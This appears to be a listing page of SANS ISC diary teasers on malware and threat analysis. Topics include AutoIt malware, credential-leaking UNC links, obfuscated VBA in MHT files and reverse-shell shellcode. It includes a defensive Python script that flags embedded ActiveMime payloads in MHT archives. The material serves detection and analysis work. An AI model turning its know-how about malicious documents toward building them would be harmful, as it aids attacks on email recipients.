Based on Lubuntu-18.04 x64, the RedHunt Linux virtual machine for adversary emulation and threat hunting is a "one stop shop for all your threat emulation and threat hunting needs. It integrates an attacker's arsenal as well as defender's toolkit to actively identify the threats in your environment."
Following yesterday's diary, I had a deeper look at the malicious AutoIt script dropped in my sandbox. For those who are not aware of AutoIt, it is a BASIC-like scripting language designed for automating Windows tasks. While scripts can be very simple, they can also interact with any feature of the operating system.
Looking back at the story I posted 2 weeks back, on getting target users to leak credentials using malicious UNC links in Office (or other) documents ( https://isc.sans.edu/forums/diary/24062/ ), how would you actually identify a malicious document of this type? After a bit of digging, it turns out that there are a few ways to do this.
For many years I've observed requests for page license.php on my webservers, from various IPs and with various User Agent Strings:
In his diary entry "Malware Delivered Through MHT Files", Xavier shows some malicious VBA code with obfuscated strings.
This diary is an update to Sextortion - Follow the Money, which tracks some of the BTC addresses related to the Sextortion campaign, still in the wild but seemingly tailing off at this time.
What are MHT files? Microsoft is a wonderful source of multiple file formats. MHT files are web page archives. Usually, a web page is based on a piece of HTML code with links to external resources, images and other media. MHT files contain all the data related to a web page in a single place and are therefore very useful to archive them. Also called MHTML (MIME Encapsulation of Aggregate HTML Documents), they are encoded like email messages using MIME parts.
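As an added example (not code from the diary), the Python below uses the standard library email parser to inventory the MIME parts of a constructed MHT, follow the <link rel=Edit-Time-Data> reference that Word uses to locate the embedded .mso part, and flag parts whose decoded payload starts with the "ActiveMime" magic of those editdata.mso containers. The sample MHT, its boundary and its file names are constructed for the example.

```python
"""Inventory the MIME parts of an MHT file and flag the ActiveMime container that carries
the embedded Office/VBA payload. Added example, not code from the diary. Assumptions:
the MHT is parsed with the standard library email package, and the payload part is
recognised by the "ActiveMime" magic that Word's editdata.mso blobs start with."""
import email
import email.policy
import re

# Constructed MHT: one HTML part (quoted-printable) linking, via the Edit-Time-Data
# relation that Word follows, to an application/x-mso part whose Base64 decodes to
# an "ActiveMime" header followed by filler bytes. Not a real sample.
SAMPLE_MHT = """\
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_NextPart_01D3"

------=_NextPart_01D3
Content-Location: file:///C:/invoice.htm
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="us-ascii"

<html><head><link rel=3DEdit-Time-Data href=3D"invoice_files/editdata.mso"></head>
<body>Invoice</body></html>

------=_NextPart_01D3
Content-Location: file:///C:/invoice_files/editdata.mso
Content-Transfer-Encoding: base64
Content-Type: application/x-mso

QWN0aXZlTWltZQAAAQAAAAAAAAAAAAAAAAAAAA==

------=_NextPart_01D3--
"""


def inventory(mht_text):
    """One dict per leaf MIME part with its decoded payload and an ActiveMime flag."""
    msg = email.message_from_string(mht_text, policy=email.policy.default)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        parts.append({
            "location": str(part.get("Content-Location", "")),
            "content_type": part.get_content_type(),
            "encoding": str(part.get("Content-Transfer-Encoding", "7bit")),
            "size": len(payload),
            "activemime": payload.startswith(b"ActiveMime"),
            "payload": payload,
        })
    return parts


def find_edit_time_data(html):
    """Return the href targets of <link rel=Edit-Time-Data ...>, the pointer Word uses to
    locate the .mso part when it opens an MHT as a document."""
    return re.findall(r'rel="?Edit-Time-Data"?\s+href="([^"]+)"', html, re.I)


def suspicious_parts(parts):
    """Parts worth extracting: ActiveMime blobs or anything declared as x-mso."""
    return [p for p in parts if p["activemime"] or p["content_type"] == "application/x-mso"]


if __name__ == "__main__":
    parts = inventory(SAMPLE_MHT)
    for p in parts:
        print(p["location"], p["content_type"], p["encoding"], p["size"],
              "ActiveMime" if p["activemime"] else "")
    html = next(p for p in parts if p["content_type"] == "text/html")
    print("Edit-Time-Data ->", find_edit_time_data(html["payload"].decode("ascii", "replace")))
```

The decoded ActiveMime blob is where the analysis continues: it wraps the OLE container with the VBA project, so it is the part to carve out and hand to an OLE/VBA tool, regardless of what the Content-Type header claims.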
[Disclaimer: This article deals with legacy IPv4 networks. IPv6 has cleaned up some of the fragmentation issues, and it looks like IPv4 is backporting some of these changes]
Microsoft released patches for 61 vulnerabilities. In addition, we got two advisories. One for the usual update for Flash, and one for a Windows DoS vulnerability.
Reader Matt was targeted with malware via email, and managed to start analyzing the content of the ZIP file served by the compromised server. It contains a .lnk file. Matt figured out that it launches the following PowerShell command:
I created a video for my diary entry "Using scdbg to analyze shellcode". In this video, I also show how to analyze shellcode with a reverse TCP shell, by setting up a server listening on the appropriate TCP port.